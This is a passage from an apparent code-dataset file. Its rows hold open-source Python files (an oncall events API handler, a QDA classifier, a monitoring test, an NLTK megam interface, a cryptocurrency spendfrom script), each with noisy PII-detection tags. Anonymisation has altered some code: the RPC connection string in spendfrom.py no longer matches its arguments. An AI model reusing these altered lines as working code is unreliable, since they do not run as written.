'hulqRequest.ht']]" +80,"# Copyright (c) LinkedIn Corporation. All rights reserved. Licensed under the BSD-2 Clause license. +# See LICENSE in the project root for license information. +import json +import time +from .events import on_get as get_events +from collections import defaultdict +import requests +from ujson import dumps as json_dumps +from falcon import HTTPStatus, HTTP_200 + + +class PaidEvents(object): + def __init__(self, config): + self.config = config + + def on_get(self, req, resp): + """""" + Search for events. Allows filtering based on a number of parameters, + detailed below. Also returns only the users who are paid to be on call. Uses response from + oncall-bonus to identify paid status. + + **Example request**: + + .. sourcecode:: http + + GET /api/v0/oncall_events?team=foo-sre&end__gt=1487466146&role=primary HTTP/1.1 + Host: example.com + + **Example response**: + + .. sourcecode:: http + + HTTP/1.1 200 OK + Content-Type: application/json + + { + ""ldap_user_id"": + [ + { + ""start"": 1488441600, + ""end"": 1489132800, + ""team"": ""foo-sre"", + ""link_id"": null, + ""schedule_id"": null, + ""role"": ""primary"", + ""user"": ""foo"", + ""full_name"": ""Foo Icecream"", + ""id"": 187795 + }, + { + ""start"": 1488441600, + ""end"": 1489132800, + ""team"": ""foo-sre"", + ""link_id"": ""PI:KEY"", + ""schedule_id"": 123, + ""role"": ""primary"", + ""user"": ""bar"", + ""full_name"": ""Bar Apple"", + ""id"": 187795 + } + ] + ] + + :query team: team name + :query user: user name + :query role: role name + :query id: id of the event + :query start: start time (unix timestamp) of event + :query end: end time (unix timestamp) of event + :query start__gt: start time (unix timestamp) greater than + :query start__ge: start time (unix timestamp) greater than or equal + :query start__lt: start time (unix timestamp) less than + :query start__le: start time (unix timestamp) less than or equal + :query end__gt: end time (unix timestamp) greater than + :query end__ge: end time (unix timestamp) greater than or equal + :query end__lt: end time (unix timestamp) less than + :query end__le: end time (unix timestamp) less than or equal + :query role__eq: role name + :query role__contains: role name contains param + :query role__startswith: role name starts with param + :query role__endswith: role name ends with param + :query team__eq: team name + :query team__contains: team name contains param + :query team__startswith: team name starts with param + :query team__endswith: team name ends with param + :query team_id: team id + :query user__eq: user name + :query user__contains: user name contains param + :query user__startswith: user name starts with param + :query user__endswith: user name ends with param + + :statuscode 200: no error + :statuscode 400: bad request + """""" + + config = self.config + oncall_bonus_blacklist = config.get('bonus_blacklist', []) + oncall_bonus_whitelist = config.get('bonus_whitelist', []) + bonus_url = config.get('bonus_url', None) + ldap_grouping = defaultdict(list) + + # if start time is not specified only fetch events in the future + if not req.params.get('start__gt'): + req.params['start__gt'] = str(int(time.time())) + + get_events(req, resp) + + # fetch team data from an externall oncall-bonus api + try: + bonus_response = requests.get(bonus_url) + bonus_response.raise_for_status() + except requests.exceptions.RequestException: + raise HTTPStatus('503 failed to contact oncall-bonus API') + + oncall_bonus_teams = bonus_response.json() + + for event in 
json.loads(resp.body): + if event['role'].lower() == 'manager': + continue + + team = event['team'] + if team in oncall_bonus_whitelist: + ldap_grouping[event['user']].append(event) + continue + if team in oncall_bonus_blacklist: + continue + + # check if event's role is payed for that team + team_payment_details = next((item for item in oncall_bonus_teams if item.get('name', '') == team), None) + if team_payment_details: + team_payed_roles = {'primary': team_payment_details.get('primary_paid', 0), 'secondary': team_payment_details.get('secondary_paid', 0)} + if team_payed_roles.get(event['role']): + ldap_grouping[event['user']].append(event) + + resp.status = HTTP_200 + resp.body = json_dumps(ldap_grouping) +",5345,"[['LOCATION', 'BSD-2'], ['NRP', 'self.config'], ['URL', 'config.ge'], ['URL', 'requests.ge'], ['URL', 'requests.exceptions.Re'], ['PERSON', ""team_payment_details.get('primary_paid""], ['PERSON', ""team_payment_details.get('secondary_paid""], ['PHONE_NUMBER', '1487466146'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', 'de:: '], ['URL', 'self.co'], ['URL', 'example.com'], ['URL', 'self.co'], ['URL', 'config.ge'], ['URL', 'config.ge'], ['URL', 'req.params.ge'], ['URL', 'req.pa'], ['URL', 'resp.bo'], ['URL', 'item.ge'], ['URL', 'details.ge'], ['URL', 'details.ge'], ['URL', 'roles.ge'], ['URL', 'resp.st'], ['URL', 'resp.bo']]" +81,""""""" +Quadratic Discriminant Analysis +"""""" + +# Author: Matthieu Perrot dummy@email.com +# +# License: BSD Style. + +import warnings + +import numpy as np +import scipy.ndimage as ndimage + +from .base import BaseEstimator, ClassifierMixin + + +# FIXME : +# - in fit(X, y) method, many checks are common with other models +# (in particular LDA model) and should be factorized: +# maybe in BaseEstimator ? + +class QDA(BaseEstimator, ClassifierMixin): + """""" + Quadratic Discriminant Analysis (QDA) + + Parameters + ---------- + X : array-like, shape = [n_samples, n_features] + Training vector, where n_samples in the number of samples and + n_features is the number of features. + y : array, shape = [n_samples] + Target vector relative to X + + priors : array, optional, shape = [n_classes] + Priors on classes + + Attributes + ---------- + `means_` : array-like, shape = [n_classes, n_features] + Class means + `priors_` : array-like, shape = [n_classes] + Class priors (sum to 1) + `covariances_` : list of array-like, shape = [n_features, n_features] + Covariance matrices of each class + + Examples + -------- + >>> from sklearn.qda import QDA + >>> import numpy as np + >>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]]) + >>> y = np.array([1, 1, 1, 2, 2, 2]) + >>> clf = QDA() + >>> clf.fit(X, y) + QDA(priors=None) + >>> print clf.predict([[-0.8, -1]]) + [1] + + See also + -------- + LDA + """""" + + def __init__(self, priors=None): + self.priors = np.asarray(priors) if priors is not None else None + + def fit(self, X, y, store_covariances=False, tol=1.0e-4): + """""" + Fit the QDA model according to the given training data and parameters. + + Parameters + ---------- + X : array-like, shape = [n_samples, n_features] + Training vector, where n_samples in the number of samples and + n_features is the number of features. + y : array, shape = [n_samples] + Target values (integers) + store_covariances : boolean + If True the covariance matrices are computed and stored in the + self.covariances_ attribute. 
+ """""" + X = np.asarray(X) + y = np.asarray(y) + if X.ndim != 2: + raise ValueError('X must be a 2D array') + if X.shape[0] != y.shape[0]: + raise ValueError( + 'Incompatible shapes: X has %s samples, while y ' + 'has %s' % (X.shape[0], y.shape[0])) + if y.dtype.char.lower() not in ('b', 'h', 'i'): + # We need integer values to be able to use + # ndimage.measurements and np.bincount on numpy >= 2.0. + # We currently support (u)int8, (u)int16 and (u)int32. + # Note that versions of scipy >= 0.8 can also accept + # (u)int64. We however don't support it for backwards + # compatibility. + y = y.astype(np.int32) + n_samples, n_features = X.shape + classes = np.unique(y) + n_classes = classes.size + if n_classes < 2: + raise ValueError('y has less than 2 classes') + classes_indices = [(y == c).ravel() for c in classes] + if self.priors is None: + counts = np.array(ndimage.measurements.sum( + np.ones(n_samples, dtype=y.dtype), y, index=classes)) + self.priors_ = counts / float(n_samples) + else: + self.priors_ = self.priors + + cov = None + if store_covariances: + cov = [] + means = [] + scalings = [] + rotations = [] + for group_indices in classes_indices: + Xg = X[group_indices, :] + meang = Xg.mean(0) + means.append(meang) + Xgc = Xg - meang + # Xgc = U * S * V.T + U, S, Vt = np.linalg.svd(Xgc, full_matrices=False) + rank = np.sum(S > tol) + if rank < n_features: + warnings.warn(""Variables are collinear"") + S2 = (S ** 2) / (len(Xg) - 1) + if store_covariances: + # cov = V * (S^2 / (n-1)) * V.T + cov.append(np.dot(S2 * Vt.T, Vt)) + scalings.append(S2) + rotations.append(Vt.T) + if store_covariances: + self.covariances_ = cov + self.means_ = np.asarray(means) + self.scalings = np.asarray(scalings) + self.rotations = rotations + self.classes = classes + return self + + def decision_function(self, X): + """"""Apply decision function to an array of samples. + + Parameters + ---------- + X : array-like, shape = [n_samples, n_features] + Array of samples (test vectors). + + Returns + ------- + C : array, shape = [n_samples, n_classes] + Decision function values related to each class, per sample. + """""" + X = np.asarray(X) + norm2 = [] + for i in range(len(self.classes)): + R = self.rotations[i] + S = self.scalings[i] + Xm = X - self.means_[i] + X2 = np.dot(Xm, R * (S ** (-0.5))) + norm2.append(np.sum(X2 ** 2, 1)) + norm2 = np.array(norm2).T # shape = [len(X), n_classes] + return (-0.5 * (norm2 + np.sum(np.log(self.scalings), 1)) + + np.log(self.priors_)) + + def predict(self, X): + """"""Perform classification on an array of test vectors X. + + The predicted class C for each sample in X is returned. + + Parameters + ---------- + X : array-like, shape = [n_samples, n_features] + + Returns + ------- + C : array, shape = [n_samples] + """""" + d = self.decision_function(X) + y_pred = self.classes[d.argmax(1)] + return y_pred + + def predict_proba(self, X): + """"""Return posterior probabilities of classification. + + Parameters + ---------- + X : array-like, shape = [n_samples, n_features] + Array of samples/test vectors. + + Returns + ------- + C : array, shape = [n_samples, n_classes] + Posterior probabilities of classification per class. + """""" + values = self.decision_function(X) + # compute the likelihood of the underlying gaussian models + # up to a multiplicative constant. 
+ likelihood = np.exp(values - values.min(axis=1)[:, np.newaxis]) + # compute posterior probabilities + return likelihood / likelihood.sum(axis=1)[:, np.newaxis] + + def predict_log_proba(self, X): + """"""Return posterior probabilities of classification. + + Parameters + ---------- + X : array-like, shape = [n_samples, n_features] + Array of samples/test vectors. + + Returns + ------- + C : array, shape = [n_samples, n_classes] + Posterior log-probabilities of classification per class. + """""" + # XXX : can do better to avoid precision overflows + probas_ = self.predict_proba(X) + return np.log(probas_) +",7053,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Matthieu Perrot'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'np.asarray(y'], ['PERSON', ""%s'""], ['LOCATION', 'n_samples'], ['PERSON', 'means.append(meang'], ['LOCATION', 'Vt ='], ['NRP', 'V.T'], ['LOCATION', 'Vt'], ['LOCATION', 'rotations.append(Vt'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['NRP', 'gaussian'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['URL', 'email.com'], ['URL', 'np.ar'], ['URL', 'np.ar'], ['URL', 'clf.fi'], ['URL', 'clf.pr'], ['URL', 'self.pr'], ['URL', 'np.as'], ['URL', 'self.co'], ['URL', 'np.as'], ['URL', 'np.as'], ['URL', 'X.sh'], ['URL', 'y.sh'], ['URL', 'X.sh'], ['URL', 'y.sh'], ['URL', 'y.dtype.ch'], ['URL', 'ndimage.me'], ['URL', 'np.bi'], ['URL', 'y.as'], ['URL', 'np.int'], ['URL', 'X.sh'], ['URL', 'classes.si'], ['URL', 'self.pr'], ['URL', 'np.ar'], ['URL', 'ndimage.measurements.su'], ['URL', 'self.pr'], ['URL', 'self.pr'], ['URL', 'self.pr'], ['URL', 'Xg.me'], ['URL', 'np.linalg.sv'], ['URL', 'np.su'], ['URL', 'np.do'], ['URL', 'self.co'], ['URL', 'self.me'], ['URL', 'np.as'], ['URL', 'self.sc'], ['URL', 'np.as'], ['URL', 'self.ro'], ['URL', 'self.cl'], ['URL', 'np.as'], ['URL', 'self.cl'], ['URL', 'self.ro'], ['URL', 'self.sc'], ['URL', 'self.me'], ['URL', 'np.do'], ['URL', 'np.su'], ['URL', 'np.ar'], ['URL', 'np.su'], ['URL', 'self.sc'], ['URL', 'self.pr'], ['URL', 'self.de'], ['URL', 'self.cl'], ['URL', 'd.ar'], ['URL', 'self.de'], ['URL', 'np.ne'], ['URL', 'likelihood.su'], ['URL', 'np.ne'], ['URL', 'self.pr']]" +82,"#!/usr/bin/env python +# -*- coding: utf-8 -*- +# +# Copyright (C) 2015-2015: Alignak team, see AUTHORS.txt file for contributors +# +# This file is part of Alignak. +# +# Alignak is free software: you can redistribute it and/or modify +# it under the terms of the GNU Affero General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# Alignak is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU Affero General Public License for more details. +# +# You should have received a copy of the GNU Affero General Public License +# along with Alignak. If not, see . +# +# +# This file incorporates work covered by the following copyright and +# permission notice: +# +# Copyright (C) 2009-2014: +# Jean Gabes, dummy@email.com +# Hartmut Goebel, dummy@email.com +# Grégory Starck, dummy@email.com +# Zoran Zaric, dummy@email.com +# Sebastien Coavoux, dummy@email.com + +# This file is part of Shinken. 
+ +# Shinken is free software: you can redistribute it and/or modify +# it under the terms of the GNU Affero General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# Shinken is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU Affero General Public License for more details. +# +# You should have received a copy of the GNU Affero General Public License +# along with Shinken. If not, see . + +# +# This file is used to test reading and processing of config files +# + +from alignak_test import * + + +class TestConfig(AlignakTest): + def setUp(self): + self.setup_with_file('etc/alignak_resultmodulation.cfg') + + def get_svc(self): + return self.sched.services.find_srv_by_name_and_hostname(""test_host_0"", ""test_ok_0"") + + def get_host(self): + return self.sched.hosts.find_by_name(""test_host_0"") + + def get_router(self): + return self.sched.hosts.find_by_name(""test_router_0"") + + def test_service_resultmodulation(self): + svc = self.get_svc() + host = self.get_host() + router = self.get_router() + + self.scheduler_loop(2, [[host, 0, 'UP | value1=1 value2=2'], [svc, 2, 'BAD | value1=0 value2=0'],]) + self.assertEqual('UP', host.state) + self.assertEqual('HARD', host.state_type) + + # This service got a result modulation. So Criticals are in fact + # Warnings. So even with some CRITICAL (2), it must be WARNING + self.assertEqual('WARNING', svc.state) + + # If we remove the resultmodulations, we should have the classic behavior + svc.resultmodulations = [] + self.scheduler_loop(2, [[host, 0, 'UP | value1=1 value2=2'], [svc, 2, 'BAD | value1=0 value2=0']]) + self.assertEqual('CRITICAL', svc.state) + + # Now look for the inherited behavior + # resultmodulation is an implicitly inherited parameter + # and router defines it, but not test_router_0/test_ok_0. 
So this service should also be impacted + svc2 = self.sched.services.find_srv_by_name_and_hostname(""test_router_0"", ""test_ok_0"") + self.assertEqual(router.resultmodulations, svc2.resultmodulations) + + self.scheduler_loop(2, [[svc2, 2, 'BAD | value1=0 value2=0']]) + self.assertEqual('WARNING', svc2.state) + + +if __name__ == '__main__': + unittest.main() +",3666,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2015-2015'], ['LOCATION', 'Alignak'], ['LOCATION', 'Alignak'], ['LOCATION', 'Alignak'], ['LOCATION', 'Alignak'], ['LOCATION', 'Alignak'], ['DATE_TIME', '2009-2014'], ['PERSON', 'Jean Gabes'], ['PERSON', 'Hartmut Goebel'], ['PERSON', 'Grégory Starck'], ['PERSON', 'Zoran Zaric'], ['PERSON', 'Sebastien Coavoux'], ['PERSON', 'Shinken'], ['PERSON', 'Shinken'], ['PERSON', 'Shinken'], ['PERSON', 'Shinken'], ['PERSON', 'test_service_resultmodulation(self'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'self.se'], ['URL', 'resultmodulation.cf'], ['URL', 'self.sched.services.fi'], ['URL', 'self.sched.hosts.fi'], ['URL', 'self.sched.hosts.fi'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.sc'], ['URL', 'self.as'], ['URL', 'host.st'], ['URL', 'self.as'], ['URL', 'host.st'], ['URL', 'self.as'], ['URL', 'svc.st'], ['URL', 'svc.re'], ['URL', 'self.sc'], ['URL', 'self.as'], ['URL', 'svc.st'], ['URL', 'self.sched.services.fi'], ['URL', 'self.as'], ['URL', 'router.re'], ['URL', 'svc2.re'], ['URL', 'self.sc'], ['URL', 'self.as'], ['URL', 'svc2.st'], ['URL', 'unittest.ma']]" +83,"# Natural Language Toolkit: Interface to Megam Classifier +# +# Copyright (C) 2001-2010 NLTK Project +# Author: Edward Loper dummy@email.com +# URL: +# For license information, see LICENSE.TXT +# +# $Id: naivebayes.py 2063 2004-07-17 21:02:24Z edloper $ + +"""""" +A set of functions used to interface with the external U{megam +} maxent optimization package. +Before C{megam} can be used, you should tell NLTK where it can find +the C{megam} binary, using the L{config_megam()} function. Typical +usage: + + >>> import nltk + >>> nltk.config_megam('.../path/to/megam') + >>> classifier = nltk.MaxentClassifier.train(corpus, 'megam') + +"""""" +__docformat__ = 'epytext en' + +import os +import os.path +import subprocess + +from nltk.internals import find_binary +try: + import numpy +except ImportError: + numpy = None + +###################################################################### +#{ Configuration +###################################################################### + +_megam_bin = None +def config_megam(bin=None): + """""" + Configure NLTK's interface to the C{megam} maxent optimization + package. + + @param bin: The full path to the C{megam} binary. If not specified, + then nltk will search the system for a C{megam} binary; and if + one is not found, it will raise a C{LookupError} exception. 
+ @type bin: C{string} + """""" + global _megam_bin + _megam_bin = find_binary( + 'megam', bin, + env_vars=['MEGAM', 'MEGAMHOME'], + binary_names=['megam.opt', 'megam', 'megam_686', 'megam_i686.opt'], + url='http://www.cs.utah.edu/~hal/megam/') + +###################################################################### +#{ Megam Interface Functions +###################################################################### + +def write_megam_file(train_toks, encoding, stream, + bernoulli=True, explicit=True): + """""" + Generate an input file for C{megam} based on the given corpus of + classified tokens. + + @type train_toks: C{list} of C{tuples} of (C{dict}, C{str}) + @param train_toks: Training data, represented as a list of + pairs, the first member of which is a feature dictionary, + and the second of which is a classification label. + + @type encoding: L{MaxentFeatureEncodingI} + @param encoding: A feature encoding, used to convert featuresets + into feature vectors. + + @type stream: C{stream} + @param stream: The stream to which the megam input file should be + written. + + @param bernoulli: If true, then use the 'bernoulli' format. I.e., + all joint features have binary values, and are listed iff they + are true. Otherwise, list feature values explicitly. If + C{bernoulli=False}, then you must call C{megam} with the + C{-fvals} option. + + @param explicit: If true, then use the 'explicit' format. I.e., + list the features that would fire for any of the possible + labels, for each token. If C{explicit=True}, then you must + call C{megam} with the C{-explicit} option. + """""" + # Look up the set of labels. + labels = encoding.labels() + labelnum = dict([(label, i) for (i, label) in enumerate(labels)]) + + # Write the file, which contains one line per instance. + for featureset, label in train_toks: + # First, the instance number. + stream.write('%d' % labelnum[label]) + + # For implicit file formats, just list the features that fire + # for this instance's actual label. + if not explicit: + _write_megam_features(encoding.encode(featureset, label), + stream, bernoulli) + + # For explicit formats, list the features that would fire for + # any of the possible labels. + else: + for l in labels: + stream.write(' #') + _write_megam_features(encoding.encode(featureset, l), + stream, bernoulli) + + # End of the instance. + stream.write('\n') + +def parse_megam_weights(s, features_count, explicit=True): + """""" + Given the stdout generated by C{megam} when training a + model, return a C{numpy} array containing the corresponding weight + vector. This function does not currently handle bias features. + """""" + if numpy is None: + raise ValueError('This function requires that numpy be installed') + assert explicit, 'non-explicit not supported yet' + lines = s.strip().split('\n') + weights = numpy.zeros(features_count, 'd') + for line in lines: + if line.strip(): + fid, weight = line.split() + weights[int(fid)] = float(weight) + return weights + +def _write_megam_features(vector, stream, bernoulli): + if not vector: + raise ValueError('MEGAM classifier requires the use of an ' + 'always-on feature.') + for (fid, fval) in vector: + if bernoulli: + if fval == 1: + stream.write(' %s' % fid) + elif fval != 0: + raise ValueError('If bernoulli=True, then all ' + 'features must be binary.') + else: + stream.write(' %s %s' % (fid, fval)) + +def call_megam(args): + """""" + Call the C{megam} binary with the given arguments. 
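+ + Example (an illustrative sketch, not part of the original module: it + assumes C{megam} is installed and that a hypothetical file + C{'train.megam'} was written by L{write_megam_file()} with + C{explicit=True}): + + >>> stdout = call_megam(['-explicit', 'multiclass', 'train.megam']) + >>> weights = parse_megam_weights(stdout, features_count) # features_count from the encoding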
+ """""" + if isinstance(args, basestring): + raise TypeError('args should be a list of strings') + if _megam_bin is None: + config_megam() + + # Call megam via a subprocess + cmd = [_megam_bin] + args + p = subprocess.Popen(cmd, stdout=subprocess.PIPE) + (stdout, stderr) = p.communicate() + + # Check the return code. + if p.returncode != 0: + print + print stderr + raise OSError('megam command failed!') + + return stdout + +",5800,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', 'http://www.nltk.org/'], ['DATE_TIME', '2001-2010'], ['PERSON', 'Edward Loper'], ['DATE_TIME', '2063 2004-07-17'], ['LOCATION', 'megam_bin'], ['PERSON', 'bin'], ['LOCATION', 'megam_bin'], ['PERSON', 'bin'], ['PERSON', 'megam_i686.opt'], ['PERSON', 'bernoulli=True'], ['LOCATION', 'C{tuples'], ['PERSON', 'bernoulli'], ['PERSON', 'labelnum'], ['PERSON', 'bernoulli'], ['PERSON', 'bernoulli'], ['PERSON', 'bernoulli'], ['LOCATION', 'fid'], ['LOCATION', 'fid'], ['LOCATION', 'megam_bin'], ['URL', 'http://www.cs.utah.edu/~hal/megam/'], ['URL', ""http://www.cs.utah.edu/~hal/megam/'""], ['URL', 'email.com'], ['URL', 'naivebayes.py'], ['URL', 'nltk.co'], ['URL', 'nltk.MaxentClassifier.tr'], ['URL', 'os.pa'], ['URL', 'nltk.int'], ['URL', 'encoding.la'], ['URL', 's.st'], ['URL', 'line.st'], ['URL', 'p.com'], ['URL', 'p.re']]" +84,"#!/usr/bin/env python +# +# Use the raw transactions API to spend ones received on particular addresses, +# and send any change back to that same address. +# +# Example usage: +# spendfrom.py # Lists available funds +# spendfrom.py --from=ADDRESS --to=ADDRESS --amount=11.00 +# +# Assumes it will talk to a oned or One-Qt running +# on localhost. +# +# Depends on jsonrpc +# + +from decimal import * +import getpass +import math +import os +import os.path +import platform +import sys +import time +from jsonrpc import ServiceProxy, json + +BASE_FEE=Decimal(""0.001"") + +def check_json_precision(): + """"""Make sure json library being used does not lose precision converting BTC values"""""" + n = Decimal(""20000000.00000003"") + satoshis = int(json.loads(json.dumps(float(n)))*1.0e8) + if satoshis != 2000000000000003: + raise RuntimeError(""JSON encode/decode loses precision"") + +def determine_db_dir(): + """"""Return the default location of the One Core data directory"""""" + if platform.system() == ""Darwin"": + return os.path.expanduser(""~/Library/Application Support/OneCore/"") + elif platform.system() == ""Windows"": + return os.path.join(os.environ['APPDATA'], ""OneCore"") + return os.path.expanduser(""~/.onecore"") + +def read_bitcoin_config(dbdir): + """"""Read the one.conf file from dbdir, returns dictionary of settings"""""" + from ConfigParser import SafeConfigParser + + class FakeSecHead(object): + def __init__(self, fp): + self.fp = fp + self.sechead = '[all]\n' + def readline(self): + if self.sechead: + try: return self.sechead + finally: self.sechead = None + else: + s = self.fp.readline() + if s.find('#') != -1: + s = s[0:s.find('#')].strip() +""\n"" + return s + + config_parser = SafeConfigParser() + config_parser.readfp(FakeSecHead(open(os.path.join(dbdir, ""one.conf"")))) + return dict(config_parser.items(""all"")) + +def connect_JSON(config): + """"""Connect to a One Core JSON-RPC server"""""" + testnet = config.get('testnet', '0') + testnet = (int(testnet) > 0) # 0/1 in config file, convert to True/False + if not 'rpcport' in config: + config['rpcport'] = 19998 if testnet else 9876 + connect = ""http://%s:dummy@email.com:%s""%(config['rpcuser'], config['rpcpassword'], config['rpcport']) 
+ try: + result = ServiceProxy(connect) + # ServiceProxy is lazy-connect, so send an RPC command mostly to catch connection errors, + # but also make sure the oned we're talking to is/isn't testnet: + if result.getmininginfo()['testnet'] != testnet: + sys.stderr.write(""RPC server at ""+connect+"" testnet setting mismatch\n"") + sys.exit(1) + return result + except: + sys.stderr.write(""Error connecting to RPC server at ""+connect+""\n"") + sys.exit(1) + +def unlock_wallet(oned): + info = oned.getinfo() + if 'unlocked_until' not in info: + return True # wallet is not encrypted + t = int(info['unlocked_until']) + if t <= time.time(): + try: + passphrase = getpass.getpass(""Wallet is locked; enter passphrase: "") + oned.walletpassphrase(passphrase, 5) + except: + sys.stderr.write(""Wrong passphrase\n"") + + info = oned.getinfo() + return int(info['unlocked_until']) > time.time() + +def list_available(oned): + address_summary = dict() + + address_to_account = dict() + for info in oned.listreceivedbyaddress(0): + address_to_account[info[""address""]] = info[""account""] + + unspent = oned.listunspent(0) + for output in unspent: + # listunspent doesn't give addresses, so: + rawtx = oned.getrawtransaction(output['txid'], 1) + vout = rawtx[""vout""][output['vout']] + pk = vout[""scriptPubKey""] + + # This code only deals with ordinary pay-to-one-address + # or pay-to-script-hash outputs right now; anything exotic is ignored. + if pk[""type""] != ""pubkeyhash"" and pk[""type""] != ""scripthash"": + continue + + address = pk[""addresses""][0] + if address in address_summary: + address_summary[address][""total""] += vout[""value""] + address_summary[address][""outputs""].append(output) + else: + address_summary[address] = { + ""total"" : vout[""value""], + ""outputs"" : [output], + ""account"" : address_to_account.get(address, """") + } + + return address_summary + +def select_coins(needed, inputs): + # Feel free to improve this, this is good enough for my simple needs: + outputs = [] + have = Decimal(""0.0"") + n = 0 + while have < needed and n < len(inputs): + outputs.append({ ""txid"":inputs[n][""txid""], ""vout"":inputs[n][""vout""]}) + have += inputs[n][""amount""] + n += 1 + return (outputs, have-needed) + +def create_tx(oned, fromaddresses, toaddress, amount, fee): + all_coins = list_available(oned) + + total_available = Decimal(""0.0"") + needed = amount+fee + potential_inputs = [] + for addr in fromaddresses: + if addr not in all_coins: + continue + potential_inputs.extend(all_coins[addr][""outputs""]) + total_available += all_coins[addr][""total""] + + if total_available < needed: + sys.stderr.write(""Error, only %f BTC available, need %f\n""%(total_available, needed)); + sys.exit(1) + + # + # Note: + # Python's json/jsonrpc modules have inconsistent support for Decimal numbers. + # Instead of wrestling with getting json.dumps() (used by jsonrpc) to encode + # Decimals, I'm casting amounts to float before sending them to oned. 
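+ # For example, json.dumps(Decimal('0.001')) raises a TypeError with the + # stock json module, while a float passes through -- at the cost of the + # precision issues that check_json_precision() guards against above.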
+ # + outputs = { toaddress : float(amount) } + (inputs, change_amount) = select_coins(needed, potential_inputs) + if change_amount > BASE_FEE: # don't bother with zero or tiny change + change_address = fromaddresses[-1] + if change_address in outputs: + outputs[change_address] += float(change_amount) + else: + outputs[change_address] = float(change_amount) + + rawtx = oned.createrawtransaction(inputs, outputs) + signed_rawtx = oned.signrawtransaction(rawtx) + if not signed_rawtx[""complete""]: + sys.stderr.write(""signrawtransaction failed\n"") + sys.exit(1) + txdata = signed_rawtx[""hex""] + + return txdata + +def compute_amount_in(oned, txinfo): + result = Decimal(""0.0"") + for vin in txinfo['vin']: + in_info = oned.getrawtransaction(vin['txid'], 1) + vout = in_info['vout'][vin['vout']] + result = result + vout['value'] + return result + +def compute_amount_out(txinfo): + result = Decimal(""0.0"") + for vout in txinfo['vout']: + result = result + vout['value'] + return result + +def sanity_test_fee(oned, txdata_hex, max_fee): + class FeeError(RuntimeError): + pass + try: + txinfo = oned.decoderawtransaction(txdata_hex) + total_in = compute_amount_in(oned, txinfo) + total_out = compute_amount_out(txinfo) + fee = total_in - total_out # the fee is whatever the outputs leave unclaimed + if fee > max_fee: + raise FeeError(""Rejecting transaction, unreasonable fee of ""+str(fee)) + + tx_size = len(txdata_hex)/2 + kb = tx_size/1000 # integer division rounds down + if kb > 1 and fee < BASE_FEE: + raise FeeError(""Rejecting no-fee transaction, larger than 1000 bytes"") + if total_in < 0.01 and fee < BASE_FEE: + raise FeeError(""Rejecting no-fee, tiny-amount transaction"") + # Exercise for the reader: compute transaction priority, and + # warn if this is a very-low-priority transaction + + except FeeError as err: + sys.stderr.write((str(err)+""\n"")) + sys.exit(1) + +def main(): + import optparse + + parser = optparse.OptionParser(usage=""%prog [options]"") + parser.add_option(""--from"", dest=""fromaddresses"", default=None, + help=""addresses to get ones from"") + parser.add_option(""--to"", dest=""to"", default=None, + help=""address to send ones to"") + parser.add_option(""--amount"", dest=""amount"", default=None, + help=""amount to send"") + parser.add_option(""--fee"", dest=""fee"", default=""0.0"", + help=""fee to include"") + parser.add_option(""--datadir"", dest=""datadir"", default=determine_db_dir(), + help=""location of one.conf file with RPC username/password (default: %default)"") + parser.add_option(""--testnet"", dest=""testnet"", default=False, action=""store_true"", + help=""Use the test network"") + parser.add_option(""--dry_run"", dest=""dry_run"", default=False, action=""store_true"", + help=""Don't broadcast the transaction, just create and print the transaction data"") + + (options, args) = parser.parse_args() + + check_json_precision() + config = read_bitcoin_config(options.datadir) + if options.testnet: config['testnet'] = True + oned = connect_JSON(config) + + if options.amount is None: + address_summary = list_available(oned) + for address,info in address_summary.iteritems(): + n_transactions = len(info['outputs']) + if n_transactions > 1: + print(""%s %.8f %s (%d transactions)""%(address, info['total'], info['account'], n_transactions)) + else: + print(""%s %.8f %s""%(address, info['total'], info['account'])) + else: + fee = Decimal(options.fee) + amount = Decimal(options.amount) + while unlock_wallet(oned) == False: + pass # Keep asking for passphrase until they get it right + txdata = create_tx(oned, 
